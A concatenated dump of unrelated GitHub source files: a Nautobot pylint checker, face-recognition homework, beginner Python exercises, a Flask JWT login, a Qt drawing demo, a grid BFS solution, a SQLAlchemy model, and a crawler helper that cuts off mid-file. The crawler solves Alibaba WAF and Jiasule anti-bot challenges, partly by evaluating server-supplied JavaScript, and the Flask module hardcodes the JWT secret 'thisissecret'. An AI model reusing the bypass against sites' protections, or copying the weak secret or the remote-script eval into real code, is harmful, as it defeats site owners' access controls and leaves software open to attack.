            "Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
        ),
        "E4213": (
            "Imports a model that has been replaced (ipam.Role -> extras.Role).",
            "nb-replaced-ipam-role",
            "Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
        ),
        "E4214": (
            "Imports a model that has been replaced (dcim.Region -> dcim.Location).",
            "nb-replaced-region",
            "Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
        ),
        "E4215": (
            "Imports a model that has been replaced (dcim.Site -> dcim.Location).",
            "nb-replaced-site",
            "Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
        ),
        "E4216": (
            "Imports a model that has been replaced (ipam.Aggregate -> ipam.Prefix).",
            "nb-replaced-aggregate",
            "Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/ipam/#replace-aggregate-with-prefix",
        ),
    }

    # Replaced model name -> message symbol, keyed by the module it lives in.
    _REPLACEMENTS = {
        "nautobot.dcim.models": {
            "DeviceRole": "nb-replaced-device-role",
            "RackRole": "nb-replaced-rack-role",
            "Region": "nb-replaced-region",
            "Site": "nb-replaced-site",
        },
        "nautobot.ipam.models": {
            "Role": "nb-replaced-ipam-role",
            "Aggregate": "nb-replaced-aggregate",
        },
    }

    def visit_importfrom(self, node):
        """Emit one message per imported name that maps to a replaced model."""
        replaced = self._REPLACEMENTS.get(node.modname)
        if not replaced:
            return
        for name, _ in node.names:
            symbol = replaced.get(name)
            if symbol is not None:
                self.add_message(symbol, node=node)
| nautobot/pylint-nautobot | pylint_nautobot/replaced_models.py | replaced_models.py | py | 3,231 | python | en | code | 4 | github-code | 36 |
44258229341 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
import tensorflow.keras.backend as K
# from keras.models import load_model
from tensorflow.keras.models import load_model
from os import listdir
from os.path import isdir
from PIL import Image
import numpy as np
from numpy import load
from numpy import expand_dims
from numpy import asarray
from sklearn.metrics import accuracy_score, pairwise_distances
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import Normalizer
from sklearn.svm import SVC
from tqdm import tqdm
def extract_face(filename, required_size=(160, 160)):
    """
    Load a single photograph and return its pixels as an RGB array.
    Inputs:
    - filename: path of a file to be converted
    - required_size: nominal face size. NOTE(review): currently unused --
      the image is returned at its original resolution; confirm whether a
      resize to required_size was intended.
    Returns:
    - array of face image pixels with RGB channels
    """
    img = Image.open(filename).convert('RGB')
    return asarray(img)
def load_faces(directory):
    """
    Load images and extract faces for all images in a directory.
    Inputs:
    - directory: path of a directory which has same person's face
    Returns:
    - list of face arrays, one per file in the directory
    """
    return [extract_face(directory + filename) for filename in listdir(directory)]
def load_dataset(directory):
    """
    Load a dataset where each class is one sub-directory of face images.
    Inputs:
    - directory: dataset root; each sub-directory holds one person's faces
    Returns:
    - asarray(samples): face image array
    - asarray(labels): class label array (sub-directory names)
    """
    samples, labels = [], []
    for subdir in listdir(directory):
        # ignore hidden entries (e.g. '.DS_Store') and plain files
        if subdir.startswith('.') or not isdir(directory + subdir + '/'):
            continue
        faces = load_faces(directory + subdir + '/')
        samples.extend(faces)
        labels.extend(subdir for _ in faces)
    return asarray(samples), asarray(labels)
def get_embedding(model, face_pixels):
    """
    Standardize one face image and run it through the embedding model.
    Inputs:
    - model: facenet model which outputs a 128-dim embedding
    - face_pixels: image array of a face
    Returns:
    - embedding vector for the single face
    """
    # scale pixel values to zero mean / unit variance before inference
    standardized = face_pixels.astype('float32')
    standardized = (standardized - standardized.mean()) / standardized.std()
    # the model expects a batch dimension, so predict on a batch of one
    batch = expand_dims(standardized, axis=0)
    return model.predict(batch)[0]
def contrastive_loss(y, emb1, emb2, margin=1.0):
    """
    Compute the contrastive loss for two embeddings.
    Inputs:
    - y: value of 1 if emb1 and emb2 are same person's face, 0 if not
    - emb1: embedding of a face
    - emb2: embedding of a face
    - margin: minimum distance enforced between negative pairs
    Returns:
    - loss: y * d^2 + (1 - y) * max(margin - d, 0)^2, d = ||emb1 - emb2||
    """
    #### Question (b): your implementation starts here (don't delete this line)
    # BUG FIX: removed a leftover debug print(emb1.shape, emb2.shape) that
    # executed on every loss evaluation.
    # Euclidean distance between the two embeddings.
    y_pred = tf.linalg.norm(emb1 - emb2)
    y = tf.cast(y, y_pred.dtype)
    # Similar pairs (y == 1) are pulled together; dissimilar pairs (y == 0)
    # are pushed apart until they are at least `margin` away.
    loss = y * tf.math.square(y_pred) + (1.0 - y) * tf.math.square(
        tf.math.maximum(margin - y_pred, 0.0)
    )
    #### Question (b): your implementation ends here (don't delete this line)
    return loss
def triplet_loss(anchor, emb1, emb2, margin=1.0):
    """
    Compute the triplet loss for an (anchor, positive, negative) triple.
    Inputs:
    - anchor: embedding of a face which is the reference
    - emb1: embedding of a positive face (same identity as anchor)
    - emb2: embedding of a negative face (different identity)
    Returns:
    - loss: mean of max(0, margin + ||a-p||^2 - ||a-n||^2)
    """
    #### Question (c): your implementation starts here (don't delete this line)
    pos_dist = tf.reduce_sum(tf.square(anchor - emb1))
    neg_dist = tf.reduce_sum(tf.square(anchor - emb2))
    hinge = tf.maximum(0., margin + pos_dist - neg_dist)
    loss = tf.reduce_mean(hinge)
    #### Question (c): your implementation ends here (don't delete this line)
    return loss
def main():
    """Train and evaluate a linear SVM face classifier on FaceNet embeddings.

    Steps: load the LFW train/val image folders, embed every face with the
    pre-trained FaceNet model, L2-normalize the embeddings, fit an SVM and
    report train/test accuracy, then sanity-check the loss functions.
    """
    # load train dataset
    trainX, trainy = load_dataset('./LFW/train/')
    print(trainX.shape, trainy.shape)
    # load test dataset
    testX, testy = load_dataset('./LFW/val/')
    print(testX.shape, testy.shape)
    # load the pre-trained facenet model (named `embedder` so it is not
    # shadowed by the SVM classifier created below)
    embedder = load_model('facenet_keras.h5', compile=False)
    # convert each face in the train set to an embedding
    print('[INFO] calculating train data embedding ...')
    newTrainX = list()
    for face_pixels in tqdm(trainX):
        newTrainX.append(get_embedding(embedder, face_pixels))
    trainX = asarray(newTrainX)
    # convert each face in the test set to an embedding
    print('[INFO] calculating test data embedding ...')
    newTestX = list()
    for face_pixels in tqdm(testX):
        newTestX.append(get_embedding(embedder, face_pixels))
    testX = asarray(newTestX)
    # normalize input vectors
    in_encoder = Normalizer(norm='l2')
    trainX = in_encoder.transform(trainX)
    testX = in_encoder.transform(testX)
    # label encode targets
    out_encoder = LabelEncoder()
    out_encoder.fit(trainy)
    trainy = out_encoder.transform(trainy)
    testy = out_encoder.transform(testy)
    '''
    Generate linear classifier model which name is 'model'
    '''
    #### Question (a): your implementation starts here (don't delete this line)
    model = SVC(gamma='auto', verbose=True)
    #### Question (a): your implementation ends here (don't delete this line)
    # train
    print('[INFO] model is training ...')
    model.fit(trainX, trainy)
    print('[INFO] training is done.')
    # predict
    yhat_train = model.predict(trainX)
    yhat_test = model.predict(testX)
    # score
    score_train = accuracy_score(trainy, yhat_train)
    score_test = accuracy_score(testy, yhat_test)
    # summarize
    print('Accuracy: train=%.3f, test=%.3f' % (score_train*100, score_test*100))
    # loss function test with sample data
    # BUG FIX: the three format strings below were missing the '%' before 'f'
    # ('... f' % (...)), which makes the % operator raise
    # "not all arguments converted during string formatting".
    print('Contrastive loss for same face: %f' % (contrastive_loss(1, trainX[0], trainX[1])))
    print('Contrastive loss for different face: %f' % (contrastive_loss(0, trainX[0], trainX[100])))
    print('Triplet loss: %f' % (triplet_loss(trainX[0], trainX[0], trainX[100])))
if __name__ == '__main__':
    main()
| vgthengane/pytorch-cv-models | h4_face.py | h4_face.py | py | 6,258 | python | en | code | 1 | github-code | 36 |
74517744744 | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 3 19:54:04 2020
@author: Tomi
This contains solutions to some list exercises from the
Python for Everybody (py4e) Course
"""
import sys
def max_and_min():
    '''Prompt the user for numbers until "done", then print the max and min.

    Non-numeric input other than "done" is rejected with a hint. Entering
    "done" before any number prints a message instead of crashing (the
    original called max()/min() on an empty list, raising ValueError).
    '''
    number_list = []
    while True:
        prompt = input('Enter number: ')
        # accept 'done' in any letter case
        if prompt.strip().lower() == 'done':
            break
        try:
            number_list.append(float(prompt))
        except ValueError:
            # float() raises ValueError for non-numeric strings
            print('enter a numerical value')
    # Guard: max()/min() on an empty sequence would raise ValueError.
    if not number_list:
        print('no numbers were entered')
        return
    print('Max:', max(number_list), 'Min:', min(number_list))
#max_and_min()
def confidence_value():
    '''Average the X-DSPAM-Confidence values found in a mail file.'''
    fname = input('Enter file name: ')
    try:
        fhand = open(fname)
    except FileNotFoundError:
        # easter egg from the course material
        if fname == 'na na boo boo':
            print("NA NA BOO BOO TO YOU - "
                  "You've been punk'd!")
        else:
            print('File does not exist')
        sys.exit()
    count = 0
    confidencesum = 0
    for line in fhand:
        if not line.startswith('X-DSPAM-Confidence:'):
            continue
        count += 1
        confidencesum += float(line.split()[1])
    try:
        print('The average confidence value is', confidencesum / count)
    except ZeroDivisionError:
        # no matching lines were found
        print('0 lines exist in the form requested')
#confidence_value()
def a_message_from():
    '''Print the sender address of every "From" line in a mail file.'''
    count = 0
    fname = input('Enter file name: ')
    try:
        fhand = open(fname)
    except FileNotFoundError:
        print(fname, 'does not exist')
        # FIX: use sys.exit() for consistency with confidence_value();
        # the built-in exit() is a site-module convenience that may be
        # absent (e.g. when running under `python -S`).
        sys.exit()
    for line in fhand:
        words = line.rstrip().split()
        # skip blank lines
        if not words:
            continue
        if words[0] == 'From':
            count += 1
            print(words[1])
    print('There were', count, 'lines in the file '
          'with From as the first word')
#a_message_from()
def my_romeo():
    '''Collect the unique words of romeo.txt and print them sorted.'''
    unique_words = []
    seen = set()
    with open('romeo.txt') as fhand:
        for line in fhand:
            for token in line.rstrip().split():
                # keep first occurrence only
                if token not in unique_words:
                    unique_words.append(token)
                    seen.add(token)
    unique_words.sort()
    print(unique_words)
#my_romeo()
| tomisile/PythonDemos | py4e Course/py4e_list_exercises.py | py4e_list_exercises.py | py | 2,570 | python | en | code | 0 | github-code | 36 |
12336375941 | #!/usr/bin/python3
"""
Defines requests for the drivers route
"""
from api.v1.views import app_views
from flask import jsonify, request, make_response
from functools import wraps
from hashlib import md5
from models import storage
from models.users import User
import datetime
import jwt
SECRET_KEY = 'thisissecret'
def token_required(f):
    """
    Decorator that validates the x-access-token JWT header and calls the
    wrapped view with the matching User as its first argument.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get('x-access-token')
        if not token:
            return jsonify({'message' : 'Token is missing!'}), 401
        try:
            data = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
        except Exception:
            return jsonify({'message' : 'Token Expired, Please Log In Again!'}), 401
        # last user whose id matches the token payload (None when absent)
        matches = [user for user in storage.all(User).values()
                   if user.id == data['id']]
        current_user = matches[-1] if matches else None
        if not current_user:
            return jsonify({'message' : 'Token is invalid!'}), 401
        return f(current_user, *args, **kwargs)
    return decorated
@app_views.route('/login', strict_slashes=False, methods=['POST'])
def login():
    """
    Validate the posted credentials and, on success, return a signed JWT
    together with the user's public profile fields.
    """
    body = request.get_json()
    # first user whose e-mail matches the submitted one (None when absent)
    user = next(
        (item for item in storage.all(User).values()
         if item.email == body.get("email")),
        None,
    )
    if not user:
        return (make_response(jsonify({"error": "Invalid Username"}), 401,
                {'WWW-Authenticate' : 'Basic realm="Login required!"'}))
    if not user.check_password(body.get("password")):
        return (make_response(
            'Invalid Password', 401,
            {'WWW-Authenticate' : 'Basic realm="Login required!"'}))
    # token is valid for 24 hours
    token = jwt.encode(
        {'id' : user.id,
         'exp' : datetime.datetime.utcnow() + datetime.timedelta(hours=24)
        }, SECRET_KEY, algorithm='HS256')
    return jsonify({'token' : token,
                    "user": {
                        "id": user.id,
                        "first_name": user.first_name,
                        "last_name": user.last_name,
                        "phonenumber": user.phonenumber,
                        "email": user.email
                    }}), 200
| NamasakaLennox/Msimu | backend/api/v1/auth.py | auth.py | py | 2,555 | python | en | code | 0 | github-code | 36 |
28613251046 | from math import cos, pi, sin
from PySide import QtCore, QtGui
class RenderArea(QtGui.QWidget):
    """Widget that paints a single QPainterPath with a configurable fill
    gradient, pen and rotation angle.

    NOTE(review): fillColor1/fillColor2/penColor only exist after the
    corresponding set* methods run; a paint event before they are called
    would raise AttributeError. The owning Window configures them right
    after construction, so this is not hit in practice -- confirm.
    """
    def __init__(self, path, parent=None):
        super(RenderArea, self).__init__(parent)

        # path to render and current drawing parameters
        self.path = path
        self.penWidth = 1
        self.rotationAngle = 0
        self.setBackgroundRole(QtGui.QPalette.Base)

    def minimumSizeHint(self):
        # smallest useful preview size
        return QtCore.QSize(50, 50)

    def sizeHint(self):
        # preferred preview size
        return QtCore.QSize(100, 100)

    def setFillRule(self, rule):
        """Apply a Qt fill rule to the path and repaint."""
        self.path.setFillRule(rule)
        self.update()

    def setFillGradient(self, color1, color2):
        """Store the two gradient stop colors and repaint."""
        self.fillColor1 = color1
        self.fillColor2 = color2
        self.update()

    def setPenWidth(self, width):
        """Store the outline pen width and repaint."""
        self.penWidth = width
        self.update()

    def setPenColor(self, color):
        """Store the outline pen color and repaint."""
        self.penColor = color
        self.update()

    def setRotationAngle(self, degrees):
        """Store the rotation (in degrees) and repaint."""
        self.rotationAngle = degrees
        self.update()

    def paintEvent(self, event):
        """Render the path scaled to the widget, rotated about its center."""
        painter = QtGui.QPainter(self)
        painter.setRenderHint(QtGui.QPainter.Antialiasing)
        # paths are authored in a 100x100 logical coordinate space
        painter.scale(self.width() / 100.0, self.height() / 100.0)
        # rotate around the logical center (50, 50)
        painter.translate(50.0, 50.0)
        painter.rotate(-self.rotationAngle)
        painter.translate(-50.0, -50.0)
        painter.setPen(QtGui.QPen(self.penColor, self.penWidth,
                QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))

        # vertical linear gradient across the logical space
        gradient = QtGui.QLinearGradient(0, 0, 0, 100)
        gradient.setColorAt(0.0, self.fillColor1)
        gradient.setColorAt(1.0, self.fillColor2)
        painter.setBrush(QtGui.QBrush(gradient))
        painter.drawPath(self.path)
class Window(QtGui.QWidget):
    """Painter-path demo window: a 3x3 grid of RenderArea previews plus
    controls for fill rule, fill gradient, pen width/color and rotation."""

    NumRenderAreas = 9

    def __init__(self):
        super(Window, self).__init__()

        # --- build the nine demo paths ---------------------------------
        rectPath = QtGui.QPainterPath()
        rectPath.moveTo(20.0, 30.0)
        rectPath.lineTo(80.0, 30.0)
        rectPath.lineTo(80.0, 70.0)
        rectPath.lineTo(20.0, 70.0)
        rectPath.closeSubpath()

        roundRectPath = QtGui.QPainterPath()
        roundRectPath.moveTo(80.0, 35.0)
        roundRectPath.arcTo(70.0, 30.0, 10.0, 10.0, 0.0, 90.0)
        roundRectPath.lineTo(25.0, 30.0)
        roundRectPath.arcTo(20.0, 30.0, 10.0, 10.0, 90.0, 90.0)
        roundRectPath.lineTo(20.0, 65.0)
        roundRectPath.arcTo(20.0, 60.0, 10.0, 10.0, 180.0, 90.0)
        roundRectPath.lineTo(75.0, 70.0)
        roundRectPath.arcTo(70.0, 60.0, 10.0, 10.0, 270.0, 90.0)
        roundRectPath.closeSubpath()

        ellipsePath = QtGui.QPainterPath()
        ellipsePath.moveTo(80.0, 50.0)
        ellipsePath.arcTo(20.0, 30.0, 60.0, 40.0, 0.0, 360.0)

        piePath = QtGui.QPainterPath()
        piePath.moveTo(50.0, 50.0)
        piePath.lineTo(65.0, 32.6795)
        piePath.arcTo(20.0, 30.0, 60.0, 40.0, 60.0, 240.0)
        piePath.closeSubpath()

        polygonPath = QtGui.QPainterPath()
        polygonPath.moveTo(10.0, 80.0)
        polygonPath.lineTo(20.0, 10.0)
        polygonPath.lineTo(80.0, 30.0)
        polygonPath.lineTo(90.0, 70.0)
        polygonPath.closeSubpath()

        groupPath = QtGui.QPainterPath()
        groupPath.moveTo(60.0, 40.0)
        groupPath.arcTo(20.0, 20.0, 40.0, 40.0, 0.0, 360.0)
        groupPath.moveTo(40.0, 40.0)
        groupPath.lineTo(40.0, 80.0)
        groupPath.lineTo(80.0, 80.0)
        groupPath.lineTo(80.0, 40.0)
        groupPath.closeSubpath()

        textPath = QtGui.QPainterPath()
        timesFont = QtGui.QFont("Times", 50)
        timesFont.setStyleStrategy(QtGui.QFont.ForceOutline)
        textPath.addText(10, 70, timesFont, "Qt")

        bezierPath = QtGui.QPainterPath()
        bezierPath.moveTo(20, 30)
        bezierPath.cubicTo(80, 0, 50, 50, 80, 80)

        # five-pointed star traced by stepping 0.8*pi radians per vertex
        starPath = QtGui.QPainterPath()
        starPath.moveTo(90, 50)
        for i in range(1, 5):
            starPath.lineTo(50 + 40 * cos(0.8 * i * pi),
                    50 + 40 * sin(0.8 * i * pi))
        starPath.closeSubpath()

        self.renderAreas = [RenderArea(rectPath), RenderArea(roundRectPath),
                RenderArea(ellipsePath), RenderArea(piePath),
                RenderArea(polygonPath), RenderArea(groupPath),
                RenderArea(textPath), RenderArea(bezierPath),
                RenderArea(starPath)]
        assert len(self.renderAreas) == Window.NumRenderAreas

        # --- controls ---------------------------------------------------
        self.fillRuleComboBox = QtGui.QComboBox()
        self.fillRuleComboBox.addItem("Odd Even", QtCore.Qt.OddEvenFill)
        self.fillRuleComboBox.addItem("Winding", QtCore.Qt.WindingFill)

        fillRuleLabel = QtGui.QLabel("Fill &Rule:")
        fillRuleLabel.setBuddy(self.fillRuleComboBox)

        self.fillColor1ComboBox = QtGui.QComboBox()
        self.populateWithColors(self.fillColor1ComboBox)
        self.fillColor1ComboBox.setCurrentIndex(
                self.fillColor1ComboBox.findText("mediumslateblue"))

        self.fillColor2ComboBox = QtGui.QComboBox()
        self.populateWithColors(self.fillColor2ComboBox)
        self.fillColor2ComboBox.setCurrentIndex(
                self.fillColor2ComboBox.findText("cornsilk"))

        fillGradientLabel = QtGui.QLabel("&Fill Gradient:")
        fillGradientLabel.setBuddy(self.fillColor1ComboBox)

        fillToLabel = QtGui.QLabel("to")
        fillToLabel.setSizePolicy(QtGui.QSizePolicy.Fixed,
                QtGui.QSizePolicy.Fixed)

        self.penWidthSpinBox = QtGui.QSpinBox()
        self.penWidthSpinBox.setRange(0, 20)

        penWidthLabel = QtGui.QLabel("&Pen Width:")
        penWidthLabel.setBuddy(self.penWidthSpinBox)

        self.penColorComboBox = QtGui.QComboBox()
        self.populateWithColors(self.penColorComboBox)
        self.penColorComboBox.setCurrentIndex(
                self.penColorComboBox.findText('darkslateblue'))

        penColorLabel = QtGui.QLabel("Pen &Color:")
        penColorLabel.setBuddy(self.penColorComboBox)

        self.rotationAngleSpinBox = QtGui.QSpinBox()
        self.rotationAngleSpinBox.setRange(0, 359)
        self.rotationAngleSpinBox.setWrapping(True)
        self.rotationAngleSpinBox.setSuffix('\xB0')

        rotationAngleLabel = QtGui.QLabel("&Rotation Angle:")
        rotationAngleLabel.setBuddy(self.rotationAngleSpinBox)

        # --- signal wiring ---------------------------------------------
        self.fillRuleComboBox.activated.connect(self.fillRuleChanged)
        self.fillColor1ComboBox.activated.connect(self.fillGradientChanged)
        self.fillColor2ComboBox.activated.connect(self.fillGradientChanged)
        self.penColorComboBox.activated.connect(self.penColorChanged)

        for i in range(Window.NumRenderAreas):
            self.penWidthSpinBox.valueChanged[int].connect(self.renderAreas[i].setPenWidth)
            self.rotationAngleSpinBox.valueChanged[int].connect(self.renderAreas[i].setRotationAngle)

        # --- layout -----------------------------------------------------
        topLayout = QtGui.QGridLayout()
        for i in range(Window.NumRenderAreas):
            # BUG FIX: row index must be an integer; the original used
            # `i / 3`, which yields a float on Python 3 and is rejected
            # by QGridLayout.addWidget.
            topLayout.addWidget(self.renderAreas[i], i // 3, i % 3)

        mainLayout = QtGui.QGridLayout()
        mainLayout.addLayout(topLayout, 0, 0, 1, 4)
        mainLayout.addWidget(fillRuleLabel, 1, 0)
        mainLayout.addWidget(self.fillRuleComboBox, 1, 1, 1, 3)
        mainLayout.addWidget(fillGradientLabel, 2, 0)
        mainLayout.addWidget(self.fillColor1ComboBox, 2, 1)
        mainLayout.addWidget(fillToLabel, 2, 2)
        mainLayout.addWidget(self.fillColor2ComboBox, 2, 3)
        mainLayout.addWidget(penWidthLabel, 3, 0)
        mainLayout.addWidget(self.penWidthSpinBox, 3, 1, 1, 3)
        mainLayout.addWidget(penColorLabel, 4, 0)
        mainLayout.addWidget(self.penColorComboBox, 4, 1, 1, 3)
        mainLayout.addWidget(rotationAngleLabel, 5, 0)
        mainLayout.addWidget(self.rotationAngleSpinBox, 5, 1, 1, 3)
        self.setLayout(mainLayout)

        # apply the initial control values to all render areas
        self.fillRuleChanged()
        self.fillGradientChanged()
        self.penColorChanged()
        self.penWidthSpinBox.setValue(2)

        self.setWindowTitle("Painter Paths")

    def fillRuleChanged(self):
        """Push the selected fill rule to every render area."""
        rule = QtCore.Qt.FillRule(self.currentItemData(self.fillRuleComboBox))

        for i in range(Window.NumRenderAreas):
            self.renderAreas[i].setFillRule(rule)

    def fillGradientChanged(self):
        """Push the selected gradient stop colors to every render area."""
        color1 = QtGui.QColor(self.currentItemData(self.fillColor1ComboBox))
        color2 = QtGui.QColor(self.currentItemData(self.fillColor2ComboBox))

        for i in range(Window.NumRenderAreas):
            self.renderAreas[i].setFillGradient(color1, color2)

    def penColorChanged(self):
        """Push the selected pen color to every render area."""
        color = QtGui.QColor(self.currentItemData(self.penColorComboBox))

        for i in range(Window.NumRenderAreas):
            self.renderAreas[i].setPenColor(color)

    def populateWithColors(self, comboBox):
        """Fill a combo box with all named Qt colors."""
        colorNames = QtGui.QColor.colorNames()
        for name in colorNames:
            comboBox.addItem(name, name)

    def currentItemData(self, comboBox):
        """Return the user data attached to the combo box's current item."""
        return comboBox.itemData(comboBox.currentIndex())

    def __del__(self):
        # drop references to the child widgets on teardown
        self.renderAreas = None
if __name__ == '__main__':

    # Standard Qt bootstrap: create the application, show the demo window
    # and hand control to the event loop until it exits.
    import sys

    app = QtGui.QApplication(sys.argv)
    window = Window()
    window.show()
    sys.exit(app.exec_())
| pyside/Examples | examples/painting/painterpaths.py | painterpaths.py | py | 9,211 | python | en | code | 357 | github-code | 36 |
24201086153 | # 백준 - 유기농 배추
import sys, collections
T = int(sys.stdin.readline())
tc = 0
def bfs(start, M, N):
    """Flood-fill the global `visited` grid from `start` over truthy cells
    of the global grid `arr`.

    M and N are the grid bounds; `start` is a [row, col] pair.
    """
    global visited
    offsets = ((-1, 0), (1, 0), (0, -1), (0, 1))  # up, down, left, right
    pending = collections.deque([start])
    while pending:
        row, col = pending.popleft()
        if visited[row][col]:
            continue
        visited[row][col] = True
        for d_row, d_col in offsets:
            nxt_row, nxt_col = row + d_row, col + d_col
            # stay inside the grid
            if not (0 <= nxt_row < M and 0 <= nxt_col < N):
                continue
            if arr[nxt_row][nxt_col] and not visited[nxt_row][nxt_col]:
                pending.append([nxt_row, nxt_col])
# Process each of the T test cases read from stdin.
while tc < T:
    # grid dimensions and number of planted cells, as given on one line
    M, N, K = map(int ,sys.stdin.readline().split(" "))
    arr = [[False for _ in range(N)] for _ in range(M)]
    visited = [[False for _ in range(N)] for _ in range(M)]
    answer = 0
    # mark the K planted positions
    for _ in range(K):
        i, j = map(int ,sys.stdin.readline().split(" "))
        arr[i][j] = True
    # every unvisited planted cell starts a new connected component
    for i in range(M):
        for j in range(N):
            if arr[i][j] and not visited[i][j]:
                answer += 1
                bfs([i,j], M, N)
    print(answer)
    tc += 1
tc += 1 | superyodi/burning-algorithm | bfs/boj_1012.py | boj_1012.py | py | 1,095 | python | en | code | 1 | github-code | 36 |
20678800215 | from __future__ import annotations
from typing import List, Optional
from sqlalchemy import BigInteger, Column, Integer, String
from pie.database import database, session
class Seeking(database.base):
    """ORM mapping for one "seeking" announcement message."""

    __tablename__ = "fun_seeking_seeking"

    idx = Column(Integer, primary_key=True, autoincrement=True)
    guild_id = Column(BigInteger)
    channel_id = Column(BigInteger, default=None)
    message_id = Column(BigInteger, unique=True)
    user_id = Column(BigInteger)
    text = Column(String)

    @staticmethod
    def add(
        guild_id: int, channel_id: int, message_id: int, user_id: int, text: str
    ) -> Seeking:
        """Persist a new row and return it."""
        entry = Seeking(
            guild_id=guild_id,
            channel_id=channel_id,
            message_id=message_id,
            user_id=user_id,
            text=text,
        )
        session.add(entry)
        session.commit()
        return entry

    @staticmethod
    def get(guild_id: int, channel_id: int, item_id: int) -> Optional[Seeking]:
        """Return the row matching (guild, channel, idx), or None."""
        lookup = session.query(Seeking).filter_by(
            guild_id=guild_id, channel_id=channel_id, idx=item_id
        )
        return lookup.one_or_none()

    @staticmethod
    def remove(guild_id: int, channel_id: int, item_id: int) -> int:
        """Delete the matching row; return the number of rows removed."""
        removed = session.query(Seeking).filter_by(
            guild_id=guild_id, channel_id=channel_id, idx=item_id
        ).delete()
        session.commit()
        return removed

    @staticmethod
    def get_all(guild_id: int, channel_id: int = None) -> List[Seeking]:
        """Return every row of a guild, optionally narrowed to one channel."""
        criteria = {"guild_id": guild_id}
        if channel_id:
            criteria["channel_id"] = channel_id
        return session.query(Seeking).filter_by(**criteria).all()

    def __repr__(self) -> str:
        return (
            f"<Seeking idx='{self.idx}' guild_id='{self.guild_id}' "
            f"channel_id='{self.channel_id}' message_id='{self.message_id}' "
            f"user_id='{self.user_id}' text='{self.text}'>"
        )

    def dump(self) -> dict:
        """Serialize the row's public fields into a plain dict."""
        return {
            "guild_id": self.guild_id,
            "channel_id": self.channel_id,
            "message_id": self.message_id,
            "user_id": self.user_id,
            "text": self.text,
        }
| pumpkin-py/pumpkin-fun | seeking/database.py | database.py | py | 2,317 | python | en | code | 0 | github-code | 36 |
20465270702 | # -*- coding: utf-8 -*-
# @Project : CrawlersTools
# @Time : 2022/6/21 17:08
# @Author : MuggleK
# @File : base_requests.py
import json
import random
import re
import time
from chardet import detect
from httpx import Client, Response
from loguru import logger
from CrawlersTools.requests.proxy import get_proxies
from CrawlersTools.requests.random_ua import UserAgent
class BaseRequests(object):
"""
A Rquests Class base on httpx
Usage:
```python
>>> base_requests = BaseRequests().base_requests
>>> response = base_requests('https://example.org')
```
"""
def base_requests(
self,
url: str,
session: object = None,
headers=UserAgent(),
method: str = "get",
proxies: dict = None,
proxy_url: str = None,
http2: bool = False,
encoding: str = None,
retry: int = 3,
**kwargs
) -> Response:
"""
内置ali_waf & 加速乐解密
:param url: 请求链接
:param session: 维持session可从外部传入
:param headers: 请求头
:param method: 具体请求方式
:param proxies: ip代理,配合proxy_url可失效自动切换
:param proxy_url: 获取代理链接
:param http2: 是否使用http2.0协议
:param retry: 请求重试次数,默认3次
:param encoding: 指定编码,默认detect解析,效果同requests的apparent_encoding
:param kwargs: 请求时需携带的其他参数
:return: Response
:exception: 1.代理失效&超过重试次数返回None 2.waf或加速乐解密失败返回None
"""
for _ in range(retry):
try:
proxies = proxies if proxies else get_proxies(proxy_url, http2=True)
session = session or Client(
http2=http2,
headers=headers,
proxies=proxies,
timeout=kwargs.get("timeout", 20),
verify=kwargs.get("verify", True),
follow_redirects=kwargs.get("allow_redirects", False)
)
response = session.request(
method=method.lower(),
url=url,
headers=headers,
content=kwargs.get("content"),
data=kwargs.get("data"),
files=kwargs.get("files"),
json=kwargs.get("json"),
params=kwargs.get("params"),
timeout=kwargs.get("timeout", 20),
follow_redirects=kwargs.get("allow_redirects", False)
)
response.encoding = encoding if encoding else detect(response.content)['encoding'] # chardet 更准确
if 200 <= response.status_code < 300 or response.status_code == 412:
if 'arg1=' in response.text:
acw_tc_cookie = f'acw_tc={session.cookies.get("acw_tc")};'
headers["Cookie"] = headers["Cookie"] + acw_tc_cookie if headers.get("Cookie") else acw_tc_cookie
reg_arg1 = re.findall("var arg1='(.*)';", response.text)[0]
arg2 = self.ali_waf(reg_arg1)
headers['cookie'] += f'acw_sc__v2={arg2}'
continue
return response
elif response.status_code == 521:
if 'document.cookie' in response.text:
cookie_key = [key for key in list(session.cookies.keys()) if key.startswith("__jsluid")][0]
headers["Cookie"] = headers["Cookie"] if headers.get("Cookie") else f'{cookie_key}={session.cookies.get(cookie_key)};'
headers["Cookie"] += f'{self.process_fuck_js(response.text)};'
continue
elif 'chars' in response.text:
__jsl_clearance_s = self.process_clearance(response.text)
headers["Cookie"] = '='.join(headers["Cookie"].split('=')[:-1]) + f'={__jsl_clearance_s};'
continue
else:
proxies = None
time.sleep(random.uniform(0, 1))
continue
except Exception as err:
logger.error(f'url:{url} error:{err} proxies:{proxies}')
proxies = None
time.sleep(random.uniform(0, 1))
continue
@staticmethod
def ali_waf(arg1):
"""
acw_sc__v2算法
:param arg1:
:return:
"""
list1 = [15, 35, 29, 24, 33, 16, 1, 38, 10, 9, 19, 31, 40, 27, 22, 23, 25, 13, 6, 11, 39, 18, 20, 8, 14, 21, 32,
26, 2, 30, 7, 4, 17, 5, 3, 28, 34, 37, 12, 36]
dict1 = {}
for i in range(len(arg1)):
string = arg1[i]
for j in range(len(list1)):
if list1[j] == i + 1:
dict1[j] = string
str1 = ''.join([dict1.get(i) for i in range(40)])
str1_list = list(str1)
str2 = "3000176000856006061501533003690027800375"
str2_list = list(str2)
str4 = ''
for m in range(0, len(str1_list), 2):
int1 = int(''.join(str1_list[m:m + 2]), 16)
int2 = int(''.join(str2_list[m:m + 2]), 16)
str3 = str(hex(int1 ^ int2))[2:]
if len(str3) == 1:
str3 = '0' + str3
str4 += str3
return str4
@staticmethod
def process_fuck_js(js_text):
import execjs
js_text = js_text.split(';location.href=loc')[0].split('document.cookie=')[-1]
r = execjs.eval(js_text).split(';')[0]
return r
@staticmethod
def process_clearance(html):
